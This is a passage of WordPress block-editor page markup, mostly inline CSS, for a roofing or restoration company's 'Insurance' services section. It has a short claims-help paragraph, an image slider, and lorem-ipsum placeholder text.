.skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"c3da108a-9f74-4c6a-b160-7db1573b31fd\"} -->\n<style type=\"text/css\"> .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-c3da108a-9f74-4c6a-b160-7db1573b31fd skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"e200d26a-3c92-4d1c-873a-846519bc681e\"} -->\n<style type=\"text/css\"> .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e200d26a-3c92-4d1c-873a-846519bc681e\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"793d8a43-7706-4aa2-ae62-65cce7fc4e0f\"} -->\n<style type=\"text/css\"> .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"731771dc-fea2-4707-b3ae-e7328f6679c5\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-731771dc-fea2-4707-b3ae-e7328f6679c5\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Insurance</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph -->\n<p>We can assist you through your claims process to insure you have a stress free experience. Damage from downed trees, wind and hail storms may qualify for up to 100% cost coverage by your insurance company. Call Dunrite today for a free inspection to gain helpful insight into the claims process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"64bd9830-1dd5-4212-b98b-e29fc494f308\"} -->\n<style type=\"text/css\"> .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-64bd9830-1dd5-4212-b98b-e29fc494f308 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"13d889c9-a6a7-4730-aeec-052e90c082e8\"} -->\n<style type=\"text/css\"> .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-13d889c9-a6a7-4730-aeec-052e90c082e8\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"25369b66-a5b1-47d5-9393-ea242ec8ece8\"} -->\n<style type=\"text/css\"> .block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/78c60d20331198e3173e4ef3aceda1e4.jpg\" alt=\"\" data-id=\"458\" data-link=\"https://cteisys.com/services/insurance/78c60d20331198e3173e4ef3aceda1e4/\" class=\"wp-image-458\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/Capture.jpg\" alt=\"\" data-id=\"459\" data-link=\"https://cteisys.com/services/insurance/capture/\" class=\"wp-image-459\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/repair1.jpg\" alt=\"\" data-id=\"460\" data-link=\"https://cteisys.com/services/insurance/repair1/\" class=\"wp-image-460\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"baecbea6-554a-432c-931f-e514f567ae29\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-baecbea6-554a-432c-931f-e514f567ae29\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"47d5ece6-7395-4ca6-8e6f-b63c1587f7ec\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"b66e007a-d6f9-4030-9a58-98df23139519\"} -->\n<style type=\"text/css\"> .block-b66e007a-d6f9-4030-9a58-98df23139519 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-b66e007a-d6f9-4030-9a58-98df23139519 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-b66e007a-d6f9-4030-9a58-98df23139519 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-b66e007a-d6f9-4030-9a58-98df23139519 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-b66e007a-d6f9-4030-9a58-98df23139519 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-b66e007a-d6f9-4030-9a58-98df23139519 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b66e007a-d6f9-4030-9a58-98df23139519 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-b66e007a-d6f9-4030-9a58-98df23139519 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"389d7fd7-5a95-4aae-84c6-df60c9ee0a8d\"} -->\n<style type=\"text/css\"> 